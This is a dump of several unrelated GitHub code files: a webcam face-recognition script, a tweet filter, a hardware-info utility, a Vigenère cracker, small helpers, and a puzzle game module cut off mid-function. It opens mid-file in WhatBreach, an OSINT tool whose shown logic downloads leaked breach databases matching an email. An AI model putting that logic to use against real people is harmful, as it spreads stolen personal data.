pertaining to query: {}\".format(\n len(downloaded), 
item\n )\n )\n display_found_databases(downloaded, is_downloaded=True)\n else:\n warn(\n \"no databases appeared to be preset and downloadable related to query: {}\".format(\n str(item)\n )\n )\n\n elif account_dumps is not None and paste_dumps is None:\n info(\"found a total of {} database breach(es) pertaining to: {}\".format(len(account_dumps), email))\n if opt.searchDehashed:\n found_databases = DehashedHook(account_dumps).hooker()\n else:\n warn(\"suppressing discovered databases\")\n found_databases = {}\n if len(found_databases) != 0:\n display_found_databases(found_databases)\n if opt.downloadDatabase:\n for item in found_databases.keys():\n if \"Paste\" not in item:\n info(\"searching for downloadable databases using query: {}\".format(item.lower()))\n downloaded = DatabasesTodayHook(\n str(item), downloads_directory=opt.saveDirectory\n ).hooker()\n if len(downloaded) != 0:\n info(\n \"downloaded a total of {} database(s) pertaining to query: {}\".format(\n len(downloaded), item\n )\n )\n display_found_databases(downloaded, is_downloaded=True)\n else:\n warn(\n \"no databases appeared to be preset and downloadable related to query: {}\".format(\n str(item)\n )\n )\n else:\n warn(\"no output to show, most likely due to output suppression or dehashed\")\n elif account_dumps is None and paste_dumps is not None:\n # this should never happen\n error(\"no database dumps found nor any pastes found for: {}\".format(email))\n else:\n error(\"email {} was not found in any breach\".format(email))\n\n if opt.staySalty:\n # i know that you think that you know shit\n # all the shade that's coming at me I wonder who throws it\n # you can't see the vision boy, you must be outta focus\n # that's a real hot program homie, I wonder who wrote it? oh shit\n # (lyrics ripped from iSpy by Kyle, all I do is steal bruh)\n warn(\"all this code was stolen with <3 by Eku\")\n except KeyboardInterrupt:\n error(\"user quit the session\")","repo_name":"falocab/WharBreach","sub_path":"whatbreach/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"35475378136","text":"import pickle\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nfrom main import image_to_embedding\nfrom sklearn.preprocessing import Normalizer\nimport cv2\nimport time\nimport sys\n\ndef predict(image):\n\n clf = pickle.load(open(\"model.sav\", 'rb'))\n\n mtcnn = MTCNN()\n resnet = InceptionResnetV1(pretrained='vggface2', classify=True).eval()\n\n embedded = image_to_embedding(mtcnn, resnet, image)\n\n in_encoder = Normalizer(norm='l2')\n embedded = in_encoder.transform(embedded)\n\n probabilities = clf.predict(embedded)\n print(probabilities)\n '''\n top_n = sorted(range(len(probabilities[0])), key=lambda i: probabilities[0][i])[-20:]\n\n for i in top_n:\n print(probabilities[0][i], clf.classes_[i])\n '''\n\ndef webcam_predict(photo_time = 5):\n cam = cv2.VideoCapture(0)\n for i in range(photo_time, 0, -1):\n print(\"Taking photo in \" + str(i) + \" seconds\")\n time.sleep(1)\n\n frame = cam.read()[1]\n cv2.imwrite('face.png', frame)\n del(cam)\n\n predict('face.png')\n\n# sys.stdout = open(\"results.txt\", \"w\")\npredict('face.jpeg')\n","repo_name":"khang-11/simple_facial_recognition","sub_path":"model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13502742509","text":"#Campbell Boswell & Scott Westvold\n#AIM - Automated Investment Manager\n#cs701 - Senior Project\n#processTweet.py\n\n\n\"\"\"\nFilters Tweets based on content so that only relevant tweets are analyzed and\nscored for sentiment. The filtered Tweets are defined as those which contain\nthe name or ticker symbol of a company listed on the S&P 500 or Tweets which\ncontain a reference to the market in general (as defined in market_keywords.py).\n\nPossible next steps for advanced filtering which might be benificial if working\nwith a larger corpus of tweets include:\n - Throwing out any tweets that contain links (indicated by strings www. and\n http), as they are likely just links to articles (or spam) and will\n be difficult to pull sentiment from. This seems a little overly\n restrictive in the current twitter-sphere though, as most tweets include\n links (potentially commenting on an article), and our sample base is\n hand selected to manually filter out accounts which are prone to spam.\n - Previous works (Bollen et al. and Mittal et al.) have restricted\n tweets to those containing words/phrases such as \"feel\", \"makes me\",\n \"I'm\", \"I am\" - this could help filter both spam and difficult to\n analyze tweets, but seems overly restrictive given the realtively small\n copus of twitter users, as well as the fact that the corpus we are working\n with has been manually selected.\n\"\"\"\nimport market_keywords\nimport company_filter\nimport company_filter_except\nimport config\nimport csv\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom pymongo import MongoClient\nimport string\n\nSTOP_WORDS = set(stopwords.words('english'))\n\n\ndef import_companies():\n '''\n A function which imports filter strings from a csv (companies.csv). As a\n means of filtering, we will build our dataset from tweets which contain\n words form one of the lists generated by this import functions.\n '''\n\n symbols = []\n company_name = []\n\n with open('companies.csv', mode='r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n symbol = row[0]\n name = row[1]\n\n symbols.append((\"$\"+symbol).lower())\n\n #break company names in to single words and filter for stopwords\n word_tokens = word_tokenize(name)\n for w in word_tokens:\n if w not in STOP_WORDS:\n company_name.append(w.lower())\n\n return symbols, company_name\n\n\ndef process_tweet():\n '''\n A lengthy function which filters tweets for relevance based on their\n content. Tweets are determined to be relevant if they contain mention of a\n company name or ticker symbol of a company on the S&P500. Additionall,\n tweets which contain a reference to financial markets as determined by\n keyword filters are included.\n\n This function updates the contents of the mongodb database which it is\n reading tweets from. If the tweet is determined to be relevant it stores a\n processed version of the tweet which has been stripped of stopwords and\n other potentially irrelevant terms. 
This functionallity is not directly used\n under our lexographic sentiment analysis approach, but might be useful under\n a machine learning sentiment analysis strategy.\n '''\n\n #Connect to the Mongo database\n client = MongoClient('localhost', 27017) #default connection and port\n db = client['tweets'] #connect to raw tweets database\n\n #import sp500 companies as company names and stock ticker symbols with $\n #prepended to ticker symbols to fit expected tweet format\n symbols, company_name = import_companies()\n\n #cf_list and cfe_dict are used to filter out common words that appear is\n #company names (i.e. united or digital)\n cf_list = company_filter.filter_list\n cfe_dict = company_filter_except.filter_dict\n keywords = market_keywords.keywords\n\n #a list which store the a percentage for each user indicateing how many\n #of their tweets are flagged as relevant\n percent_relevant = []\n\n '''Adding twitter specific words to STOP_WORDS set'''\n STOP_WORDS.add(\"rt\")\n\n '''itterate through all contentes of all mongo collections'''\n #itterate through each pre-selected twitter user (whos user names are\n #stored in the file specified by USER_LIST)\n with open(config.user_list) as csv_file:\n user_csv = csv.reader(csv_file, delimiter=',')\n\n #total count of how many tweets are inserted across all users\n total_tweets_processed = 0\n total_tweets_inserted = 0\n\n next(user_csv) #skip the first line of the file which contains lables\n\n for row in user_csv:\n user = row[0]\n print(\"Processing Tweets for @\" + user)\n\n tweets_inserted = 0 #per user count of how many tweets are inserted\n user_tweets_processed = 0 #per user count of how many tweets are processed\n\n collection = db[user] #connect to user's collection in our database\n count = collection.count()\n cursor = collection.find()\n\n #a set of all terms which \"trigger\" a tweet as relevant\n trigger_word_set = set([])\n\n for i in range(0, count):\n doc = cursor.next()\n\n mongo_id = doc['_id']\n text = doc['text'].lower()\n\n #craft a new mongo document with processed_text field\n processed_tweet = {\n \"date\": doc['date'],\n \"id\": doc['id'],\n \"retweet_count\": doc['retweet_count'],\n \"favorite_count\": doc['favorite_count'],\n \"text\": doc['text'],\n \"lang\": doc['lang'],\n \"processed_text\": \"\"\n }\n\n '''clean the tweet by removing any non-printable symbols & urls'''\n cleaned_text = \"\"\n special_word = False #twitter handles or hashtags - indicated by # or @\n\n for c in text:\n if (c == '@') or (c == \"#\"):\n special_word = True\n if (c in string.whitespace):\n special_word = False\n cleaned_text += c\n if (c in string.ascii_lowercase) and (special_word == False):\n cleaned_text += c\n\n '''filter tweets for relevance and remove stopwords'''\n relevant_tweet = False\n processed_text = \"\"\n company_name_token = \"\"\n\n word_tokens = word_tokenize(cleaned_text)\n for w in word_tokens:\n\n #if the tweet contains a company symbol or keyword, it's\n #automatically relevant\n if (w in symbols) or (w in keywords):\n relevant_tweet = True\n trigger_word_set.add(w)\n\n #if the tweet contains a word from our list of words which\n #comprise all company names, we first need to check if the\n #word is not in cfe_dict and not in cf_list\n if (w in company_name):\n if (w not in cf_list) and (w not in cfe_dict): #i.e. 
not a special case...\n relevant_tweet = True\n trigger_word_set.add(w)\n\n #if the company_name_token is not the empty string, then\n #we know the word we just looked at was in the cfe_dict.\n #We want to check if the current word (w) is the value\n #associated with the key specified by company_name_token\n #in cfe_dict. We perform this check first so that it is\n #not triggered by the initial assignment of\n #company_name_token, and we reset company_name_token\n #after this if statement is triggered.\n if company_name_token != \"\":\n if w in cfe_dict[company_name_token]:\n relevant_tweet = True\n trigger_word_set.add(company_name_token)\n company_name_token = \"\" #reset company_name_token\n\n #if word w is in our dictionary of common company\n #names, which is comprises of only the first words in\n #company names which have multiple words and are\n #unintentionally common (i.e. united, citizens, etc.),\n #we want to verify that the next word (if there is a\n #next word) is also part of the same company name.\n if w in cfe_dict:\n company_name_token += w\n\n if (w not in STOP_WORDS) and (\"http\" not in w) and\\\n (w not in trigger_word_set):\n processed_text += w + \" \"\n\n '''update processed_text field if tweet is relevant/passes our filters'''\n if relevant_tweet == True:\n processed_tweet[\"processed_text\"] = processed_text\n tweets_inserted += 1\n total_tweets_inserted += 1\n\n update_result = collection.replace_one(filter=doc, replacement=processed_tweet)\n\n user_tweets_processed += 1\n total_tweets_processed += 1\n\n '''Printing \"success\" rate'''\n print(\"Tweets processed: \" + str(user_tweets_processed) + \\\n \" Tweets inserted: \" + str(tweets_inserted) +\\\n \" %\" + str((tweets_inserted/user_tweets_processed)*100))\n\n #add to our list of user relevance percentages\n percent_relevant.append((tweets_inserted/user_tweets_processed)*100)\n\n store_relevance(percent_relevant)\n\n return total_tweets_processed, total_tweets_inserted\n\n\ndef store_relevance(percent_relevant):\n '''\n A simple helper function that will store data regarding the amount of tweets\n which were flagged as relevant for each user. The file that is output will\n be used in the generation of visualizations in generateVisualization.py\n '''\n\n with open('per_user_relevance.csv', 'w', newline='') as out_file:\n writer = csv.writer(out_file)\n\n with open(config.user_list) as in_file:\n reader = csv.reader(in_file, delimiter=',')\n next(reader) #skip the first line of the file which contains lables\n\n #itterate throught the user list and store their username along\n #with relevance percentage our writer csv\n i = 0\n for row in reader:\n user = row[0]\n percent = percent_relevant[i]\n writer.writerow([user, percent])\n i += 1\n\n\n\ndef main():\n # Process tweets\n total_tweets_processed, total_tweets_inserted = process_tweet()\n print(\"Total tweets processed: \" + str(total_tweets_processed))\n print(\"Total tweets inserted: \"+ str(total_tweets_inserted))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cmboswell/AIM","sub_path":"processTweet.py","file_name":"processTweet.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"16157920629","text":"from ._device import get_processor_name, get_num_cpu_threads, get_gpu_name, \\\n get_num_gpu_devices, get_nvidia_driver_version\nfrom ._memory import Memory\nfrom ._cuda import locate_cuda\nfrom ..__version__ import __version__\n\n__all__ = ['info']\n\n\n# ====\n# info\n# ====\n\ndef info(print_only=True):\n \"\"\"\n Provides general information about hardware device, package version, and\n memory usage.\n\n Parameters\n ----------\n\n print_only : bool, default=True\n It `True`, it prints the output. If `False`, it returns the output as\n a dictionary.\n\n Returns\n -------\n\n info_dict : dict\n (Only if ``print_only`` is `False`). A dictionary with the following\n keys:\n\n * ``imate_version``: `str`, the version of the imate package in the\n format ``\"major_version.minor_version.patch_number\"``.\n * ``processor``: `str`, the model name of the CPU processor.\n * ``num_threads``, `int`, number of CPU threads that are available and\n allocated to the user.\n * ``gpu_name``: `str`, model name of the GPU devices.\n * ``num_gpu_devices``: `int`, number of GPU devices in multi-GPU\n platforms.\n * ``cuda_version``: `str`, the version of CUDA Toolkit installed on the\n machine in the format ``\"major_version.minor_version.patch_number\"``.\n * ``nvidia_driver``: `str`, the version of NVIDIA graphic driver.\n * ``mem_used``: `int`, resident memory usage for the current Python\n process.\n * ``mem_unit``, `str`, the unit in which ``mem_used`` is reported. This\n can be ``\"b\"`` for Byte, ``\"KB\"`` for Kilo-Byte, ``\"MB\"`` for\n Mega-Byte, ``\"GB\"`` for Giga-Byte, and ``\"TB\"`` for Tera-Byte.\n\n See Also\n --------\n\n imate.device.get_processor_name\n imate.device.get_gpu_name\n imate.device.get_num_cpu_threads\n imate.device.get_num_gpu_devices\n imate.device.get_nvidia_driver_version\n imate.Memory\n imate.device.locate_cuda\n\n Notes\n -----\n\n **CUDA Version:**\n\n In order to find CUDA Toolkit information properly, either of the\n environment variables ``CUDA_HOME``, ``CUDA_ROOT``, or ``CUDA_PATH`` should\n be set to the directory where CUDA Toolkit is installed. Usually on UNIX\n operating systems, this path is ``/usr/local/cuda``. In this case, set\n ``CUDA_HOME`` (or any of the other variables mentioned in the above) as\n follows:\n\n ::\n\n export CUDA_HOME=/usr/local/cuda\n\n To permanently set this variable, place the above line in ``profile`` file,\n such as in ``~/.bashrc``, or ``~/.profile``, and source this file, for\n instance by\n\n ::\n\n source ~/.bashrc\n\n If no CUDA Toolkit is installed, then the key ``cuda_version`` shows\n `not found`.\n\n .. note::\n\n It is possible that the CUDA Toolkit is installed on the machine, but\n ``cuda_version`` key shows `not found`. This is because the user did\n not set the environment variables mentioned in the above.\n\n **GPU Devices:**\n\n If the key ``gpu_name`` shows `not found`, this is because either\n\n * No GPU device is detected on the machine.\n * GPU device exists, but NVIDIA graphic driver is not installed. See\n :ref:`Install NVIDIA Graphic Driver ` for further\n details.\n * NVIDIA graphic driver is installed, but the executable ``nvidia-smi`` is\n not available on the `PATH``. To fix this, set the location of the\n ``nvidia-smi`` executable on the ``PATH`` variable.\n\n **Memory:**\n\n The key ``mem_used`` shows the resident set size memory (RSS) on RAM\n hardware. 
The unit of the reported memory size can be found in\n ``mem_unit``, which can be ``b`` for Bytes, ``KB`` for Kilo-Bytes, ``MB``\n for Mega-Bytes, and so on.\n\n Examples\n --------\n\n Print information:\n\n .. code-block:: python\n\n >>> from imate import info\n >>> info()\n imate version : 0.13.0\n processor : Intel(R) Xeon(R) CPU E5-2623 v3 @ 3.00GHz\n num threads : 8\n gpu device : 'GeForce GTX 1080 Ti'\n num gpu devices : 4\n cuda version : 11.2.0\n nvidia driver : 460.84\n process memory : 1.7 (Gb)\n\n Return information as a dictionary:\n\n .. code-block:: python\n\n >>> from imate import info\n >>> info_dict = info(print_only=False)\n\n >>> # Neatly print dictionary using pprint\n >>> from pprint import pprint\n >>> pprint(info_dict)\n {\n 'imate version': 0.13.0,\n 'processor': Intel(R) Xeon(R) CPU E5-2623 v3 @ 3.00GHz,\n 'num threads': 8,\n 'gpu device': 'GeForce GTX 1080 Ti',\n 'num gpu devices': 4,\n 'cuda version': 11.2.0,\n 'nvidia driver': 460.84,\n 'process memory': 1.7 (Gb)\n }\n \"\"\"\n\n mem_used, mem_unit = Memory.get_resident_memory(human_readable=True)\n\n # Get cuda version\n cuda = locate_cuda()\n if cuda != {}:\n cuda_version = cuda['version']\n cuda_version_ = '%d.%d.%d' \\\n % (cuda_version['major'], cuda_version['minor'],\n cuda_version['patch'])\n else:\n cuda_version_ = 'not found'\n\n # NVIDIA driver version\n nvidia_driver = get_nvidia_driver_version()\n\n info_ = {\n 'imate_version': __version__,\n 'processor_name': get_processor_name(),\n 'num_cpu_threads': get_num_cpu_threads(),\n 'gpu_name': get_gpu_name(),\n 'num_gpu_devices': get_num_gpu_devices(),\n 'mem_used': mem_used,\n 'mem_unit': mem_unit,\n 'cuda_version': cuda_version_,\n 'nvidia_driver': nvidia_driver,\n }\n\n # Print\n if print_only:\n print('')\n print('imate version : %s' % info_['imate_version'])\n print('processor : %s' % info_['processor_name'])\n print('num threads : %d' % info_['num_cpu_threads'])\n print('gpu device : %s' % info_['gpu_name'])\n print('num gpu devices : %d' % info_['num_gpu_devices'])\n print('cuda version : %s' % info_['cuda_version'])\n print('nvidia driver : %s' % info_['nvidia_driver'])\n print('process memory : %0.1f (%s)'\n % (info_['mem_used'], info_['mem_unit']))\n print('')\n else:\n return info_\n","repo_name":"ameli/imate","sub_path":"imate/device/_info.py","file_name":"_info.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"23931275420","text":"import sys\n\nfname = sys.argv[1]\ncipher = open(fname).read()\n\nrate = {\n 'A': 0.082,\n 'B': 0.015,\n 'C': 0.028,\n 'D': 0.043,\n 'E': 0.127,\n 'F': 0.022,\n 'G': 0.020,\n 'H': 0.061,\n 'I': 0.070,\n 'J': 0.002,\n 'K': 0.008,\n 'L': 0.040,\n 'M': 0.024,\n 'N': 0.067,\n 'O': 0.075,\n 'P': 0.019,\n 'Q': 0.001,\n 'R': 0.060,\n 'S': 0.063,\n 'T': 0.091,\n 'U': 0.028,\n 'V': 0.010,\n 'W': 0.023,\n 'X': 0.001,\n 'Y': 0.020,\n 'Z': 0.001,\n}\n\ndef group(c, length):\n res = [[] for _ in range(length)]\n for i in range(len(c)):\n res[i % length].append(c[i].upper())\n\n return res\n\n\ndef calc_CI(c, length):\n res = []\n for cipher_t in group(c, length):\n tmp = 0.0\n for alpha in rate.keys():\n alpha_c = cipher_t.count(alpha)\n tmp += alpha_c * (alpha_c - 1)\n\n res.append(tmp / (len(cipher_t) * (len(cipher_t) - 1)))\n return sum(res) / len(res)\n\n\nCIs = []\nfor i in range(1, 64):\n CIs.append((i, calc_CI(cipher, i)))\n\nCIs.sort(key=lambda x: abs(x[1] - 0.065))\nk_len = [x[0] for x in CIs]\n\nfor length in k_len:\n output = []\n for cipher_t in group(cipher, length):\n t = {ord(a): cipher_t.count(a) for a in rate.keys()}\n\n res = {}\n for offset in range(26):\n tmp = 0\n for a in t.keys():\n tmp += t[a] * rate[chr((\n (a - 65 + offset) % 26) + 65)]\n res[offset] = tmp\n \n res = sorted(res.items(), key=lambda x: abs(x[1] - 0.065))\n output.append(chr((21 - res[0][0]) % 26 + ord('A')))\n key = ''.join(output)\n\n print(f'KEY_LENGTH={length} -> {key}')\n","repo_name":"EddieIvan01/cryptography-course","sub_path":"classical/crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41336775239","text":"# validate.py - Contains validation checks.\n\n# Import standard library helpers.\nimport unicodedata\n\ndef normalize_nfkd(s):\n \"\"\"Perform NFKD normalization on an input string.\n\n :param s: String to normalize.\n :return: Returns normalized string.\n \"\"\" \n return unicodedata.normalize(\"NFKD\", s)\n\n\ndef caseless_compare(a, b):\n \"\"\"Given two strings, perform a caseless comparison between them.\n\n :param a: Left-hand string.\n :param b: Right-hand string.\n :returns: Returns 0 if equal. Returns 1 if the normalized a > b, alphabetically. Otherwise, returns -1.\n \"\"\" \n if a is None or b is None:\n raise ValueError(\"Cannot compare to None-type argument.\")\n \n # Will fail if either is not a string.\n norm_a = normalize_nfkd(a.casefold())\n norm_b = normalize_nfkd(b.casefold())\n \n if norm_a == norm_b:\n return 0\n elif norm_a > norm_b:\n return 1\n elif norm_a < norm_b:\n return -1\n\n\ndef is_empty(s):\n \"\"\"Check if input string or iterable is empty. \n \n :param s: String or iterable to check.\n :return: True if input is empty.\n \"\"\"\n if s:\n return False\n else:\n return True\n\n\ndef is_whitespace(s):\n \"\"\"Check if input string is empty or contains only whitespace.\n \n :param s: String to check.\n :return: True if input is only whitespace.\n \"\"\"\n return is_empty(\"\".join(s.strip()))\n\n\ndef is_numeric(s):\n \"\"\"Check if input string is a numeric.\n \n :param s: String to check.\n :return: True if input is a numeric. False if empty or not a numeric.\n \"\"\"\n try:\n int(s)\n return True\n except (TypeError, ValueError):\n return False\n","repo_name":"rimij405/dsci-623_midterm","sub_path":"src/analysis/utils/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7734702026","text":"def lis(a,n):\n i,j,maxm = 0,0,0\n\n lst = [1 for s in range(n)]\n for i in range(n):\n for j in range(0,i):\n if a[i]>a[j] and lst[i]string callable object that converts a local-tag\n name to a namespace-qualified QName\n \n returns a dictionay with entries:\n points : (N,3) array of point coordinates\n triangles: (K,3) array of indices, each index in range(N)\n \"\"\"\n from numpy import array, float_, int_\n assert( meshNode.tag == ns('mesh') )\n \n retVal = dict()\n coordinates = list()\n vs = meshNode.find( ns('vertices'))\n if vs is None:\n raise ValueError(\"No vertices element found for mesh\")\n for pnode in vs.findall( ns('vertex')):\n p = tuple([float( pnode.get(cn)) for cn in ('x','y','z')])\n coordinates.append(p)\n retVal['points'] = array( coordinates )\n \n indices = list()\n ts = meshNode.find( ns('triangles'))\n if ts is None:\n raise ValueError(\"Mesh triangles not found\")\n \n for tnode in ts.findall( ns('triangle')):\n t = tuple([int( tnode.get(jn)) for jn in ('v1','v2','v3')])\n indices.append(t)\n retVal['triangles'] = array(indices)\n \n return retVal\n\n \n","repo_name":"vincentmarchetti/x3d_3mf_conversions","sub_path":"convert_3mf_to_x3d/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"5524737819","text":"\"\"\"Player interactions.\"\"\"\n\nimport dataclasses\nimport enum\nimport itertools\nfrom typing import Optional, Sequence, Set, Tuple, Union\nfrom . import play_objects\nfrom . import walls\n\nSpeed = Tuple[int, int]\nSquaresType = Union[Set[Tuple[int, int]], 'Squares']\n_DEFAULT_INFLATION = (100, 100)\n\n\nclass ItemEffectType(enum.Enum):\n REMOVE = enum.auto()\n ADD = enum.auto()\n\n\nclass ObjectEffectType(enum.Enum):\n REMOVE = enum.auto()\n ADD = enum.auto()\n HIDE = enum.auto()\n\n\nclass StateEffectType(enum.Enum):\n REMOVE = enum.auto()\n\n\n@dataclasses.dataclass\nclass Effect:\n type: Union[ItemEffectType, ObjectEffectType, StateEffectType]\n target: str\n\n @classmethod\n def remove_item(cls, item):\n return cls(ItemEffectType.REMOVE, item)\n\n @classmethod\n def add_item(cls, item):\n return cls(ItemEffectType.ADD, item)\n\n @classmethod\n def remove_object(cls, obj):\n return cls(ObjectEffectType.REMOVE, obj)\n\n @classmethod\n def add_object(cls, obj):\n return cls(ObjectEffectType.ADD, obj)\n\n @classmethod\n def hide_object(cls, obj):\n return cls(ObjectEffectType.HIDE, obj)\n\n @classmethod\n def remove_state(cls, state):\n return cls(StateEffectType.REMOVE, state)\n\n\n@dataclasses.dataclass\nclass Collision:\n reason: str\n max_nocollision_speed: Optional[Speed]\n play_area_effects: Sequence[Effect] = ()\n\n def closer_than(self, speed):\n # See play_area.Surface._check_player_collision. When two possible\n # collisions are in the same direction, the closer one is the one for\n # which the maximum speed that avoids collision is less.\n if self.max_nocollision_speed and speed:\n return abs(sum(self.max_nocollision_speed)) < abs(sum(speed))\n elif speed:\n return True\n else:\n return False\n\n\n@dataclasses.dataclass\nclass Item:\n reason: str\n item_effects: Sequence[Effect] = ()\n play_area_effects: Sequence[Effect] = ()\n\n\n@dataclasses.dataclass\nclass Use:\n reason: str\n activator: Tuple[str, ...]\n item_effects: Sequence[Effect] = ()\n play_area_effects: Sequence[Effect] = ()\n\n\nclass Squares(enum.Enum):\n DEFAULT = enum.auto()\n ALL = enum.auto()\n\n\n@dataclasses.dataclass\nclass _Config:\n # Which squares a player has to be in to interact with an object.\n squares: SquaresType = Squares.DEFAULT\n # How much to inflate the object size when determining whether the player is\n # close enough to interact with it.\n inflation: Tuple[int, int] = _DEFAULT_INFLATION\n\n\n_Config.DEFAULT = _Config()\n\n\ndef _collision(name) -> Union[str, Tuple[str, Sequence[Effect]]]:\n if walls.match(name) or walls.partial_match(name):\n return \"That's a wall...\"\n elif name == 'house':\n return \"You don't want to go back in the house.\"\n elif name.startswith('flowers_'):\n return 'The sweet scent of wildflowers makes your nose itch.'\n elif name.startswith('tree_'):\n return 'The tree leaves rustle gently in the breeze.'\n elif name == 'key':\n return \"It's some sort of key.\"\n elif name == 'gate':\n return \"There's a gate here, but it's locked.\"\n elif name.startswith('open_gate_'):\n return 'You walk into the gate. Ouch.'\n elif name.startswith('block_'):\n return 'An oversized alphabet block. How curious.'\n elif name == 'billboard_2':\n return 'It\\'s a billboard. It says, \"Go up.\"'\n elif name == 'billboard_3':\n return '\"Seriously, go up.\"'\n elif name == 'billboard_4':\n return ('\"Roses are red, violets are blue. 
My billboards are lies, '\n 'did I fool you?\"')\n elif name == 'bunny_prints':\n return 'What are these tracks?'\n elif name == 'bunny':\n return 'A bunny! Your heart melts.'\n elif name == 'eggplant':\n return 'An eggplant. Ew.'\n elif name == 'trash_can':\n return 'Do you have the eggplant?'\n elif name == 'fishing_rod':\n return 'Who left a fishing rod here?'\n elif name == 'lake':\n return 'What a lovely calm lake.'\n elif name == 'angry_cat':\n return 'Your way is blocked by an angry cat.'\n elif name == 'happy_cat':\n return 'The well-fed cat purrs when you pet it.'\n elif name == 'cake':\n return 'A huge chocolate cake!'\n elif name == 'invisible_wall':\n return ('Thinking of the cake, you suddenly crave something sweet.',\n (Effect.remove_state('pre_crave'),))\n elif name == 'bucket':\n return 'You wonder why random stuff is scattered all over the place.'\n elif name == 'matches':\n return 'Ooh, matches.'\n elif name == 'doll':\n return \"It's a worn cloth doll with button eyes and yarn hair.\"\n elif name == 'shrubbery':\n return 'Your way is blocked by a shrubbery.'\n elif name == 'fire':\n return 'Your way is blocked by a flaming shrubbery.'\n elif name == 'hole':\n return \"It's a hole in the ground.\"\n elif name == 'billboard_16':\n return '\"Go down.\"'\n elif name == 'billboard_10':\n return ('\"Roses are red, violets are blue. Believe it or not, I '\n 'sometimes tell the truth =P\"')\n elif name.startswith('puzzle_') or name.startswith('slotted_block_'):\n return 'This wall looks unusual.'\n else:\n raise NotImplementedError(f'Collided with {name}')\n\n\ndef collide(name, speed) -> Collision:\n result: Union[str, Tuple[str, Sequence[Effect]]] = _collision(name)\n if isinstance(result, str):\n return Collision(result, speed)\n else:\n reason, effects = result\n return Collision(reason, speed, effects)\n\n\ndef _simple_obtain_effects(name):\n return [(Effect.add_item(name),), (Effect.remove_object(name),)]\n\n\ndef obtain(name) -> Optional[Item]:\n if name in (f'tree_{fruit}' for fruit in play_objects.FRUITS):\n fruit = name[len('tree_'):]\n return Item(f'You pick a ripe {fruit}.', (Effect.add_item(fruit),))\n elif name == 'key':\n return Item('You pick up the key.', *_simple_obtain_effects(name))\n elif name.startswith('block_'):\n return Item(\n 'You decide to carry the giant wooden block around with you.',\n *_simple_obtain_effects(name))\n elif name == 'eggplant':\n return Item('You gingerly pick up the disgusting vegetable.',\n *_simple_obtain_effects(name))\n elif name == 'fishing_rod':\n return Item(\"You steal someone's fishing rod.\",\n *_simple_obtain_effects(name))\n elif name == 'cake':\n return Item('On closer inspection, the cake is made of styrofoam.')\n elif name == 'bucket':\n return Item('Finders keepers, right?', *_simple_obtain_effects(name))\n elif name == 'matches':\n return Item('You never know what you may want to set on fire.',\n *_simple_obtain_effects(name))\n elif name == 'hole':\n return Item(\n 'You fall into the hole and climb back out. 
You feel foolish.')\n elif name.startswith('slotted_block_'):\n block_char = name[len('slotted_block_')]\n slot_char = name[-1]\n return Item('You pry the block back out of the wall slot.',\n (Effect.add_item(f'block_{block_char}'),),\n (Effect.hide_object(name),\n Effect.add_object(f'puzzle_slot_{slot_char}')))\n else:\n return None\n\n\ndef _use_block(block_char, slot_char):\n block = f'block_{block_char}'\n slot = f'puzzle_slot_{slot_char}'\n slotted_block = f'slotted_{block}_in_{slot_char}'\n activator = (slot,)\n item_effects = (Effect.remove_item(block),)\n play_area_effects = (Effect.hide_object(slot),\n Effect.add_object(slotted_block))\n if block_char == slot_char:\n solver = activator + ('puzzle_door',) + tuple(\n f'slotted_block_{char}_in_{char}'\n for char in 'LOVE' if char != block_char)\n yield Use(\n 'As you slot the block in, you hear a rumbling sound. The middle '\n 'of the wall sinks into the ground.', solver, item_effects,\n play_area_effects + (Effect.remove_object('puzzle_door'),))\n yield Use('The block fits perfectly in this slot in the wall.', activator,\n item_effects, play_area_effects)\n\n\ndef use(name) -> Sequence[Use]:\n if name in play_objects.FRUITS:\n item_effects = (Effect.remove_item(name),)\n reason = f'You eat the {name}. '\n return [Use(reason + 'Yum.', ('pre_crave',), item_effects),\n Use(reason + 'Your sweet craving is satisfied.',\n ('invisible_wall',), item_effects,\n (Effect.remove_object('invisible_wall'),)),\n Use(reason + 'You feel bloated.', (), item_effects)]\n elif name == 'key':\n play_area_effects = (Effect.remove_object('gate'),\n Effect.add_object('open_gate_left'),\n Effect.add_object('open_gate_right'))\n return [Use('You unlock the gate.', ('gate',),\n (Effect.remove_item('key'),), play_area_effects)]\n elif name.startswith('block_'):\n block_char = name[len('block_'):]\n uses = []\n for slot_char in 'LOVE':\n uses.extend(_use_block(block_char, slot_char))\n return uses\n elif name == 'eggplant':\n return [\n Use('You feed the cat the eggplant. The cat is even angrier now.',\n ('angry_cat',), (Effect.remove_item('eggplant'),)),\n Use(\"Yeah, you don't need that.\", ('trash_can',),\n (Effect.remove_item('eggplant'),))]\n elif name == 'fishing_rod':\n item_effects = (Effect.remove_item('fishing_rod'),\n Effect.add_item('fish'))\n return [Use(\"You catch a tasty-looking fish.\", ('lake',), item_effects)]\n elif name == 'fish':\n play_area_effects = (Effect.remove_object('angry_cat'),\n Effect.add_object('happy_cat'))\n return [\n Use('You feed the cat the fish. The cat is happy.', ('angry_cat',),\n (Effect.remove_item('fish'),), play_area_effects)]\n elif name == 'bucket':\n item_effects = (Effect.remove_item('bucket'),\n Effect.add_item('filled_bucket'))\n return [Use('You fill the bucket with lake water.', ('lake',),\n item_effects)]\n 